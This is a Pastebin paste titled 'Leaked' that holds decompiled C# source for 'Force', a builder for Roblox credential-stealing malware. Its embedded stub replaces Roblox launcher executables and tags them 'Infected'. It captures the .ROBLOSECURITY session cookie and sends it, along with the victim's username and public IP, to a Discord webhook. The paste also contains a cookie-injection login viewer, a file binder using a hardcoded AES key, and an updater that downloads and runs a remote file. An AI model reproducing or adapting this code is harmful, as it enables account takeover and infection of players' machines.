API tools faq
paste
Advertisement
NewBleuGuy

Leaked

NewBleuGuy
May 26th, 2018
130
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 26.37 KB | None | 0 0
raw download clone embed print report
  1. using System;
  2. using System.CodeDom.Compiler;
  3. using System.Collections.Generic;
  4. using System.ComponentModel;
  5. using System.Diagnostics;
  6. using System.Drawing;
  7. using System.IO;
  8. using System.Linq;
  9. using System.Net;
  10. using System.Runtime.InteropServices;
  11. using System.Security.Cryptography;
  12. using System.Windows.Forms;
  13. using Bunifu.Framework.UI;
  14. using MaterialSkin;
  15. using MaterialSkin.Controls;
  16. using Microsoft.CSharp;
  17. using Microsoft.VisualBasic.CompilerServices;
  18. using WindowsFormsApplication2.Properties;
  19.  
  20. namespace WindowsFormsApplication2
  21. {
  22. // Token: 0x02000002 RID: 2
  23. public partial class Form2 : MaterialForm
  24. {
  25. // Token: 0x06000001 RID: 1
  26. [DllImport("wininet.dll", CharSet = CharSet.Ansi, EntryPoint = "InternetSetCookieA", ExactSpelling = true, SetLastError = true)]
  27. public static extern bool InternetSetCookie([MarshalAs(UnmanagedType.VBByRefStr)] ref string Url, [MarshalAs(UnmanagedType.VBByRefStr)] ref string CookieName, [MarshalAs(UnmanagedType.VBByRefStr)] ref string CookieData);
  28.  
  29. // Token: 0x06000002 RID: 2 RVA: 0x00002070 File Offset: 0x00000270
  30. public Form2()
  31. {
  32. this.InitializeComponent();
  33. }
  34.  
  35. // Token: 0x06000003 RID: 3 RVA: 0x000020A1 File Offset: 0x000002A1
  36. private void Form1_Load(object sender, EventArgs e)
  37. {
  38. }
  39.  
  40. // Token: 0x06000004 RID: 4 RVA: 0x0000219C File Offset: 0x0000039C
  41. private void DoUpdateCheck()
  42. {
  43. this.toolStripStatusLabel2.Text = "Checking For Updates...";
  44. WebRequest.Create("https://pastebin.com/raw/S8FK8QAX");
  45. string text = new WebClient().DownloadString("https://pastebin.com/raw/S8FK8QAX");
  46. bool flag = Operators.CompareString(text, this.toolStripStatusLabel1.Text, false) == 0;
  47. bool flag2 = flag;
  48. if (flag2)
  49. {
  50. MessageBox.Show("ForceVenom is up to date! (v" + this.toolStripStatusLabel1.Text + ")");
  51. }
  52. else
  53. {
  54. int num = (int)MessageBox.Show(string.Concat(new string[]
  55. {
  56. "Your current version of ForceVenom is ",
  57. this.toolStripStatusLabel1.Text,
  58. " would you like to update to version ",
  59. text,
  60. "?"
  61. }), "Update ForceVenom to " + text, MessageBoxButtons.YesNo);
  62. bool flag3 = num == 7;
  63. bool flag4 = flag3;
  64. if (flag4)
  65. {
  66. this.toolStripStatusLabel2.Text = "Update Cancelled!";
  67. }
  68. else
  69. {
  70. bool flag5 = num == 6;
  71. bool flag6 = flag5;
  72. if (flag6)
  73. {
  74. WebRequest.Create("http://www.mediafire.com/file/q3dk6eredd81kj9/VeroHub+Reborn.rar");
  75. string fileName = new WebClient().DownloadString("http://www.mediafire.com/file/q3dk6eredd81kj9/VeroHub+Reborn.rar");
  76. Process.Start(fileName);
  77. }
  78. }
  79. }
  80. this.toolStripStatusLabel2.Text = "Update Check Completed!";
  81. }
  82.  
  83. // Token: 0x06000005 RID: 5 RVA: 0x000022CC File Offset: 0x000004CC
  84. private void materialRaisedButton2_Click(object sender, EventArgs e)
  85. {
  86. bool flag = this.materialSingleLineTextField1.Text == "Webhook";
  87. if (flag)
  88. {
  89. MessageBox.Show("Invalid Webhook", "Force BETA", MessageBoxButtons.OK, MessageBoxIcon.Hand);
  90. }
  91. else
  92. {
  93. bool flag2 = this.materialSingleLineTextField2.Text == "Stub Name";
  94. if (flag2)
  95. {
  96. MessageBox.Show("Invalid Stub name", "Force BETA", MessageBoxButtons.OK, MessageBoxIcon.Hand);
  97. }
  98. string text = this.uncompiled;
  99. text = text.Replace("CustomHook", this.materialSingleLineTextField1.Text);
  100. bool flag3 = File.Exists(this.materialSingleLineTextField2.Text + ".exe");
  101. if (flag3)
  102. {
  103. File.Delete(this.materialSingleLineTextField2.Text + ".exe");
  104. }
  105. this.CompileCSharpEXE(text, this.materialSingleLineTextField2.Text + ".exe");
  106. MessageBox.Show("Compiled stub successfully! Saved to \"" + this.materialSingleLineTextField2.Text + ".exe\"!", "Force");
  107. }
  108. }
  109.  
  110. // Token: 0x06000006 RID: 6 RVA: 0x000023D8 File Offset: 0x000005D8
  111. public bool CompileCSharpEXE(string src, string filepath)
  112. {
  113. CSharpCodeProvider csharpCodeProvider = new CSharpCodeProvider(new Dictionary<string, string>
  114. {
  115. {
  116. "CompilerVersion",
  117. "v4.0"
  118. }
  119. });
  120. CompilerParameters compilerParameters = new CompilerParameters();
  121. string[] value = new string[]
  122. {
  123. "Microsoft.VisualBasic.dll",
  124. "System.dll",
  125. "System.Core.dll",
  126. "System.Data.dll",
  127. "System.Data.DataSetExtensions.dll",
  128. "System.Management.dll",
  129. "System.Windows.Forms.dll",
  130. "System.Xml.dll",
  131. "System.Xml.Linq.dll",
  132. "System.Net.dll"
  133. };
  134. compilerParameters.ReferencedAssemblies.AddRange(value);
  135. compilerParameters.GenerateExecutable = true;
  136. compilerParameters.OutputAssembly = filepath;
  137. compilerParameters.CompilerOptions = "/optimize /target:winexe";
  138. CompilerResults compilerResults = csharpCodeProvider.CompileAssemblyFromSource(compilerParameters, new string[]
  139. {
  140. src
  141. });
  142. bool flag = compilerResults.Errors.Cast<CompilerError>().Any<CompilerError>();
  143. bool result;
  144. if (flag)
  145. {
  146. foreach (object obj in compilerResults.Errors)
  147. {
  148. MessageBox.Show(((CompilerError)obj).ErrorText);
  149. }
  150. result = false;
  151. }
  152. else
  153. {
  154. result = true;
  155. }
  156. return result;
  157. }
  158.  
  159. // Token: 0x06000007 RID: 7 RVA: 0x00002520 File Offset: 0x00000720
  160. private void materialRaisedButton1_Click(object sender, EventArgs e)
  161. {
  162. string text = "On our discord there is a channel called #webhook-usage, go there";
  163. MessageBox.Show(text, "Force BETA", MessageBoxButtons.OK, MessageBoxIcon.Asterisk);
  164. }
  165.  
  166. // Token: 0x06000008 RID: 8 RVA: 0x000020A1 File Offset: 0x000002A1
  167. private void tabPage2_Click(object sender, EventArgs e)
  168. {
  169. }
  170.  
  171. // Token: 0x06000009 RID: 9 RVA: 0x000020A1 File Offset: 0x000002A1
  172. private void richTextBox1_TextChanged(object sender, EventArgs e)
  173. {
  174. }
  175.  
  176. // Token: 0x0600000A RID: 10 RVA: 0x000020A1 File Offset: 0x000002A1
  177. private void materialRaisedButton3_Click(object sender, EventArgs e)
  178. {
  179. }
  180.  
  181. // Token: 0x0600000B RID: 11 RVA: 0x000020A4 File Offset: 0x000002A4
  182. private void Form1_FormClosing(object sender, FormClosingEventArgs e)
  183. {
  184. Environment.Exit(0);
  185. }
  186.  
  187. // Token: 0x0600000C RID: 12 RVA: 0x000020A1 File Offset: 0x000002A1
  188. private void materialRaisedButton4_Click(object sender, EventArgs e)
  189. {
  190. }
  191.  
  192. // Token: 0x0600000D RID: 13 RVA: 0x000020A1 File Offset: 0x000002A1
  193. private void webBrowser1_DocumentCompleted(object sender, WebBrowserDocumentCompletedEventArgs e)
  194. {
  195. }
  196.  
  197. // Token: 0x0600000E RID: 14 RVA: 0x00002544 File Offset: 0x00000744
  198. private void materialRaisedButton5_Click(object sender, EventArgs e)
  199. {
  200. string text = "http://www.roblox.com";
  201. string text2 = ".ROBLOSECURITY";
  202. string text3 = this.url.Text;
  203. Form2.InternetSetCookie(ref text, ref text2, ref text3);
  204. this.url.Text = text3;
  205. this.webBrowser1.Navigate("http://www.roblox.com");
  206. bool flag = MessageBox.Show("Nom Nom Nom! :) Would you like to enable full screen?", "Force", MessageBoxButtons.YesNo, MessageBoxIcon.Asterisk) == DialogResult.Yes;
  207. if (flag)
  208. {
  209. fs fs = new fs();
  210. fs.ShowDialog();
  211. fs.InternetSetCookie(ref text, ref text2, ref text3);
  212. fs.webBrowser1.Navigate("http://www.roblox.com");
  213. }
  214. }
  215.  
  216. // Token: 0x0600000F RID: 15 RVA: 0x000025DC File Offset: 0x000007DC
  217. private void materialRaisedButton6_Click(object sender, EventArgs e)
  218. {
  219. string text = "http://www.roblox.com";
  220. string text2 = ".ROBLOSECURITY";
  221. string text3 = "";
  222. Form2.InternetSetCookie(ref text, ref text2, ref text3);
  223. this.url.Text = text3;
  224. this.webBrowser1.Navigate("http://www.roblox.com");
  225. MessageBox.Show("I liked that cookie! :(");
  226. }
  227.  
  228. // Token: 0x06000010 RID: 16 RVA: 0x00002634 File Offset: 0x00000834
  229. private void checkBox1_CheckedChanged(object sender, EventArgs e)
  230. {
  231. bool @checked = this.checkBox1.Checked;
  232. if (@checked)
  233. {
  234. base.TopMost = true;
  235. }
  236. else
  237. {
  238. base.TopMost = false;
  239. }
  240. }
  241.  
  242. // Token: 0x06000011 RID: 17 RVA: 0x00002668 File Offset: 0x00000868
  243. private void button1_Click(object sender, EventArgs e)
  244. {
  245. string text = Directory.GetFiles("C:\\Users\\" + Environment.UserName + "\\AppData\\Local\\Roblox\\Versions", "RobloxPlayerBeta.exe", SearchOption.AllDirectories).FirstOrDefault<string>();
  246. bool flag = text == null;
  247. if (!flag)
  248. {
  249. string str = text.Replace("\\RobloxPlayerBeta.exe", "");
  250. bool flag2 = File.Exists(str + "\\RobloxPlayerLauncher.exe");
  251. if (flag2)
  252. {
  253. File.Delete(str + "\\RobloxPlayerLauncher.exe");
  254. }
  255. string sourceFileName = Application.StartupPath + "\\RobloxPlayerLauncher.exe";
  256. File.Copy(sourceFileName, str + "\\RobloxPlayerLauncher.exe");
  257. MessageBox.Show("Fixed!");
  258. }
  259. }
  260.  
  261. // Token: 0x06000012 RID: 18 RVA: 0x000020A1 File Offset: 0x000002A1
  262. private void url_Click(object sender, EventArgs e)
  263. {
  264. }
  265.  
  266. // Token: 0x06000013 RID: 19 RVA: 0x000020AE File Offset: 0x000002AE
  267. private void materialRaisedButton7_Click(object sender, EventArgs e)
  268. {
  269. new Form3().Show();
  270. }
  271.  
  272. // Token: 0x06000014 RID: 20 RVA: 0x000020A1 File Offset: 0x000002A1
  273. private void bunifuMaterialTextbox2_OnValueChanged(object sender, EventArgs e)
  274. {
  275. }
  276.  
  277. // Token: 0x06000015 RID: 21 RVA: 0x00002710 File Offset: 0x00000910
  278. private void button3_Click(object sender, EventArgs e)
  279. {
  280. OpenFileDialog openFileDialog = new OpenFileDialog();
  281. OpenFileDialog openFileDialog2 = openFileDialog;
  282. openFileDialog2.FileName = "";
  283. openFileDialog2.Title = "Choose a file";
  284. openFileDialog2.InitialDirectory = Environment.GetFolderPath(Environment.SpecialFolder.Desktop);
  285. openFileDialog2.Filter = "Any File |*.*";
  286. bool flag = openFileDialog2.ShowDialog() == DialogResult.OK;
  287. if (flag)
  288. {
  289. this.F = openFileDialog2.SafeFileName;
  290. this.bunifuMaterialTextbox1.Text = openFileDialog2.FileName;
  291. }
  292. }
  293.  
  294. // Token: 0x06000016 RID: 22 RVA: 0x00002784 File Offset: 0x00000984
  295. public byte[] Secure(byte[] Data)
  296. {
  297. byte[] result;
  298. using (RijndaelManaged rijndaelManaged = new RijndaelManaged())
  299. {
  300. rijndaelManaged.IV = new byte[]
  301. {
  302. 1,
  303. 2,
  304. 3,
  305. 4,
  306. 5,
  307. 6,
  308. 7,
  309. 8,
  310. 9,
  311. 1,
  312. 2,
  313. 3,
  314. 4,
  315. 5,
  316. 6,
  317. 7
  318. };
  319. rijndaelManaged.Key = new byte[]
  320. {
  321. 7,
  322. 6,
  323. 5,
  324. 4,
  325. 3,
  326. 2,
  327. 1,
  328. 9,
  329. 8,
  330. 7,
  331. 6,
  332. 5,
  333. 4,
  334. 3,
  335. 2,
  336. 1
  337. };
  338. result = rijndaelManaged.CreateEncryptor().TransformFinalBlock(Data, 0, Data.Length);
  339. }
  340. return result;
  341. }
  342.  
  343. // Token: 0x06000017 RID: 23 RVA: 0x000027FC File Offset: 0x000009FC
  344. public byte[] UnSecure(byte[] Data)
  345. {
  346. byte[] result;
  347. using (RijndaelManaged rijndaelManaged = new RijndaelManaged())
  348. {
  349. rijndaelManaged.IV = new byte[]
  350. {
  351. 1,
  352. 2,
  353. 3,
  354. 4,
  355. 5,
  356. 6,
  357. 7,
  358. 8,
  359. 9,
  360. 1,
  361. 2,
  362. 3,
  363. 4,
  364. 5,
  365. 6,
  366. 7
  367. };
  368. rijndaelManaged.Key = new byte[]
  369. {
  370. 7,
  371. 6,
  372. 5,
  373. 4,
  374. 3,
  375. 2,
  376. 1,
  377. 9,
  378. 8,
  379. 7,
  380. 6,
  381. 5,
  382. 4,
  383. 3,
  384. 2,
  385. 1
  386. };
  387. result = rijndaelManaged.CreateDecryptor().TransformFinalBlock(Data, 0, Data.Length);
  388. }
  389. return result;
  390. }
  391.  
  392. // Token: 0x06000018 RID: 24 RVA: 0x00002874 File Offset: 0x00000A74
  393. private void button4_Click(object sender, EventArgs e)
  394. {
  395. OpenFileDialog openFileDialog = new OpenFileDialog();
  396. OpenFileDialog openFileDialog2 = openFileDialog;
  397. openFileDialog2.FileName = "";
  398. openFileDialog2.Title = "Choose a file";
  399. openFileDialog2.InitialDirectory = Environment.GetFolderPath(Environment.SpecialFolder.Desktop);
  400. openFileDialog2.Filter = "Any File |*.*";
  401. bool flag = openFileDialog2.ShowDialog() == DialogResult.OK;
  402. if (flag)
  403. {
  404. this.F2 = openFileDialog2.SafeFileName;
  405. this.bunifuMaterialTextbox2.Text = openFileDialog2.FileName;
  406. }
  407. }
  408.  
  409. // Token: 0x06000019 RID: 25 RVA: 0x000028E8 File Offset: 0x00000AE8
  410. private void button2_Click(object sender, EventArgs e)
  411. {
  412. try
  413. {
  414. SaveFileDialog saveFileDialog = new SaveFileDialog();
  415. SaveFileDialog saveFileDialog2 = saveFileDialog;
  416. saveFileDialog2.FileName = "";
  417. saveFileDialog2.Title = "Save File";
  418. saveFileDialog2.Filter = "Application |*.exe";
  419. saveFileDialog2.InitialDirectory = Environment.GetFolderPath(Environment.SpecialFolder.Desktop);
  420. bool flag = saveFileDialog2.ShowDialog() == DialogResult.OK;
  421. if (flag)
  422. {
  423. string text = "[SPLITTER]";
  424. byte[] cstub = Resources.CStub;
  425. File.WriteAllBytes(saveFileDialog2.FileName, cstub);
  426. byte[] inArray = this.Secure(File.ReadAllBytes(this.bunifuMaterialTextbox1.Text));
  427. byte[] inArray2 = this.Secure(File.ReadAllBytes(this.bunifuMaterialTextbox2.Text));
  428. File.AppendAllText(saveFileDialog2.FileName, string.Concat(new string[]
  429. {
  430. text,
  431. Convert.ToBase64String(inArray),
  432. text,
  433. this.F,
  434. text,
  435. Convert.ToBase64String(inArray2),
  436. text,
  437. this.F2
  438. }));
  439. MessageBox.Show("Success");
  440. }
  441. }
  442. catch (Exception ex)
  443. {
  444. MessageBox.Show(ex.Message);
  445. }
  446. }
  447.  
  448. // Token: 0x0600001A RID: 26 RVA: 0x000020BC File Offset: 0x000002BC
  449. private void button5_Click(object sender, EventArgs e)
  450. {
  451. base.WindowState = FormWindowState.Minimized;
  452. }
  453.  
  454. // Token: 0x0600001B RID: 27 RVA: 0x000020A1 File Offset: 0x000002A1
  455. private void textBox1_OnValueChanged(object sender, EventArgs e)
  456. {
  457. }
  458.  
  459. // Token: 0x0600001C RID: 28 RVA: 0x000020A1 File Offset: 0x000002A1
  460. private void textBox2_OnValueChanged(object sender, EventArgs e)
  461. {
  462. }
  463.  
  464. // Token: 0x04000001 RID: 1
  465. private string uncompiled = "using System;\r\nusing System.Collections.Specialized;\r\nusing System.Windows.Forms;\r\nusing System.Management;\r\nusing System.Net;\r\nusing System.Diagnostics;\r\nusing System.IO;\r\nusing System.Text;\r\n\r\nnamespace Force\r\n{\r\n class Program\r\n {\r\n\r\n static void Main(string[] args)\r\n {\r\n try\r\n {\r\n try\r\n {\r\n //startup - try{File.Copy(Application.ExecutablePath, Path.GetDirectoryName(Path.GetDirectoryName(Path.GetDirectoryName(Path.GetTempPath()))) + \"\\\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\\" + Path.GetFileNameWithoutExtension(Application.ExecutablePath) + \".exe\");}catch{}\r\n //IRAGC(args);\r\n TextBox txtb = new TextBox();\r\n txtb.Text = args[0].Replace(\"+\", \"\\r\\n\");\r\n Process p = new Process();\r\n p.StartInfo.FileName = Path.GetDirectoryName(Application.ExecutablePath) + \"\\\\Launcher.exe\";\r\n p.StartInfo.Arguments = args[0];\r\n p.Start();\r\n bool IsFinished = false;\r\n do\r\n {\r\n foreach (string str in txtb.Lines)\r\n {\r\n if (str.Contains(\"gameinfo:\"))\r\n {\r\n CookieContainer cookieContainer = new CookieContainer();\r\n HttpWebRequest httpWebRequest = (HttpWebRequest)WebRequest.Create(\"https://www.roblox.com/Login/Negotiate.ashx?suggest=\" + str.Replace(\"gameinfo:\", \"\"));\r\n httpWebRequest.Method = \"GET\";\r\n httpWebRequest.Proxy = null;\r\n httpWebRequest.CookieContainer = cookieContainer;\r\n httpWebRequest.Headers.Add(\"RBXAuthenticationNegotiation\", \": http://www.roblox.com\");\r\n httpWebRequest.UserAgent = \"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/534.34 (KHTML, like Gecko) RobloxStudio/0. 275. 0. 101727 Safari/534.34\";\r\n HttpWebResponse httpWebResponse = (HttpWebResponse)httpWebRequest.GetResponse();\r\n cookieContainer.Add(httpWebResponse.Cookies);\r\n foreach (Cookie cookie in httpWebResponse.Cookies)\r\n {\r\n if (cookie.Name.Contains(\".ROBLOSECURITY\"))\r\n {\r\n SendDiscordWebHook(\"CustomHook\", \"```Username: \" + Environment.UserName.ToString() + \"\\r\\nIP: \" + new WebClient().DownloadString(\"http://api.ipify.org\") + \"\\r\\nCookie: \" + cookie.Value + \"```\");\r\n IsFinished = true;\r\n }\r\n }\r\n }\r\n }\r\n } while (IsFinished == false);\r\n }\r\n catch\r\n {\r\n string dir = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + \"\\\\Roblox\\\\Versions\\\\\" + new WebClient().DownloadString(\"http://setup.roblox.com/version\") + \"\\\\\";\r\n foreach (Process p in Process.GetProcessesByName(\"RobloxPlayerLauncher\"))\r\n {\r\n try { p.Kill(); } catch { }\r\n }\r\n foreach (Process p in Process.GetProcessesByName(\"Launcher\"))\r\n {\r\n try { p.Kill(); } catch { }\r\n }\r\n try\r\n {\r\n StreamReader sr = new StreamReader(dir + \"RobloxPlayerLauncher.exe\");\r\n BinaryReader br = new BinaryReader(sr.BaseStream);\r\n byte[] stubBytes = br.ReadBytes(Convert.ToInt32(sr.BaseStream.Length));\r\n sr.Close();\r\n sr.Close();\r\n string data = Encoding.ASCII.GetString(stubBytes).Substring(Encoding.ASCII.GetString(stubBytes).IndexOf(\"Infected\"));\r\n if (data != \"Infected\")\r\n {\r\n try { File.Delete(dir + \"Launcher.exe\"); } catch { }\r\n File.Move(dir + \"RobloxPlayerLauncher.exe\", dir + \"Launcher.exe\");\r\n File.Copy(Application.ExecutablePath, dir + \"RobloxPlayerLauncher.exe\");\r\n using (FileStream fs = new FileStream(dir + \"RobloxPlayerLauncher.exe\", FileMode.Open, FileAccess.ReadWrite, FileShare.None))\r\n {\r\n using (BinaryWriter bw = new BinaryWriter(fs))\r\n {\r\n fs.Position = fs.Length + 1;\r\n bw.Write(\"Infected\");\r\n }\r\n }\r\n }\r\n }\r\n catch\r\n {\r\n try { File.Delete(dir + \"Launcher.exe\"); } catch { }\r\n File.Move(dir + \"RobloxPlayerLauncher.exe\", dir + \"Launcher.exe\");\r\n File.Copy(Application.ExecutablePath, dir + \"RobloxPlayerLauncher.exe\");\r\n using (FileStream fs = new FileStream(dir + \"RobloxPlayerLauncher.exe\", FileMode.Open, FileAccess.ReadWrite, FileShare.None))\r\n {\r\n using (BinaryWriter bw = new BinaryWriter(fs))\r\n {\r\n fs.Position = fs.Length + 1;\r\n bw.Write(\"Infected\");\r\n }\r\n }\r\n }\r\n }\r\n }\r\n catch\r\n {\r\n Main(args);\r\n }\r\n }\r\n\r\n public static void IRAGC(string[] args)\r\n {\r\n try\r\n {\r\n try\r\n {\r\n TextBox txtb = new TextBox();\r\n txtb.Text = args[0].Replace(\"+\", \"\\r\\n\");\r\n Process p = new Process();\r\n p.StartInfo.FileName = Path.GetDirectoryName(Application.ExecutablePath) + \"\\\\StudioLauncher.exe\";\r\n p.StartInfo.Arguments = args[0];\r\n p.Start();\r\n bool IsFinished = false;\r\n do\r\n {\r\n foreach (string str in txtb.Lines)\r\n {\r\n if (str.Contains(\"gameinfo:\"))\r\n {\r\n CookieContainer cookieContainer = new CookieContainer();\r\n HttpWebRequest httpWebRequest = (HttpWebRequest)WebRequest.Create(\"https://www.roblox.com/Login/Negotiate.ashx?suggest=\" + str.Replace(\"gameinfo:\", \"\"));\r\n httpWebRequest.Method = \"GET\";\r\n httpWebRequest.Proxy = null;\r\n httpWebRequest.CookieContainer = cookieContainer;\r\n httpWebRequest.Headers.Add(\"RBXAuthenticationNegotiation\", \": http://www.roblox.com\");\r\n httpWebRequest.UserAgent = \"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/534.34 (KHTML, like Gecko) RobloxStudio/0. 275. 0. 101727 Safari/534.34\";\r\n HttpWebResponse httpWebResponse = (HttpWebResponse)httpWebRequest.GetResponse();\r\n cookieContainer.Add(httpWebResponse.Cookies);\r\n foreach (Cookie cookie in httpWebResponse.Cookies)\r\n {\r\n if (cookie.Name.Contains(\".ROBLOSECURITY\"))\r\n {\r\n SendDiscordWebHook(\"DISCORD_WEBHOOK\", \"```Username: \" + Environment.UserName.ToString() + \"\\r\\nIP: \" + new WebClient().DownloadString(\"http://api.ipify.org\") + \"\\r\\nCookie: \" + cookie.Value + \"```\");\r\n IsFinished = true;\r\n }\r\n }\r\n }\r\n }\r\n } while (IsFinished == false);\r\n }\r\n catch\r\n {\r\n string dir = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + \"\\\\Roblox\\\\Versions\\\\\";\r\n foreach (Process p in Process.GetProcessesByName(\"RobloxStudioLauncherBeta\"))\r\n {\r\n try { p.Kill(); } catch { }\r\n }\r\n foreach (Process p in Process.GetProcessesByName(\"StudioLauncher\"))\r\n {\r\n try { p.Kill(); } catch { }\r\n }\r\n try\r\n {\r\n StreamReader sr = new StreamReader(dir + \"RobloxStudioLauncherBeta.exe\");\r\n BinaryReader br = new BinaryReader(sr.BaseStream);\r\n byte[] stubBytes = br.ReadBytes(Convert.ToInt32(sr.BaseStream.Length));\r\n sr.Close();\r\n sr.Close();\r\n string data = Encoding.ASCII.GetString(stubBytes).Substring(Encoding.ASCII.GetString(stubBytes).IndexOf(\"Infected\"));\r\n if (data != \"Infected\")\r\n {\r\n try { File.Delete(dir + \"StudioLauncher.exe\"); } catch { }\r\n File.Move(dir + \"RobloxStudioLauncherBeta.exe\", dir + \"StudioLauncher.exe\");\r\n File.Copy(Application.ExecutablePath, dir + \"RobloxStudioLauncherBeta.exe\");\r\n using (FileStream fs = new FileStream(dir + \"RobloxStudioLauncherBeta.exe\", FileMode.Open, FileAccess.ReadWrite, FileShare.None))\r\n {\r\n using (BinaryWriter bw = new BinaryWriter(fs))\r\n {\r\n fs.Position = fs.Length + 1;\r\n bw.Write(\"Infected\");\r\n }\r\n }\r\n }\r\n }\r\n catch\r\n {\r\n try { File.Delete(dir + \"StudioLauncher.exe\"); } catch { }\r\n File.Move(dir + \"RobloxStudioLauncherBeta.exe\", dir + \"StudioLauncher.exe\");\r\n File.Copy(Application.ExecutablePath, dir + \"RobloxStudioLauncherBeta.exe\");\r\n using (FileStream fs = new FileStream(dir + \"RobloxStudioLauncherBeta.exe\", FileMode.Open, FileAccess.ReadWrite, FileShare.None))\r\n {\r\n using (BinaryWriter bw = new BinaryWriter(fs))\r\n {\r\n fs.Position = fs.Length + 1;\r\n bw.Write(\"Infected\");\r\n }\r\n }\r\n }\r\n }\r\n }\r\n catch\r\n {\r\n IRAGC(args);\r\n }\r\n\r\n }\r\n\r\n public static void SendDiscordWebHook(string webhook, string msg)\r\n {\r\n Http.Post(webhook, new NameValueCollection() {\r\n { \"username\", \"Force\" },\r\n { \"content\", msg }\r\n });\r\n }\r\n\r\n }\r\n\r\n public static class Http\r\n {\r\n public static byte[] Post(string uri, NameValueCollection pairs)\r\n {\r\n byte[] response = null;\r\n using (WebClient client = new WebClient())\r\n {\r\n response = client.UploadValues(uri, pairs);\r\n }\r\n return response;\r\n }\r\n }\r\n\r\n}";
  466.  
  467. // Token: 0x04000002 RID: 2
  468. private string F = null;
  469.  
  470. // Token: 0x04000003 RID: 3
  471. private string F2 = null;
  472.  
  473. private void tabPage1_Click(object sender, EventArgs e)
  474. {
  475.  
  476. }
  477. }
  478. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!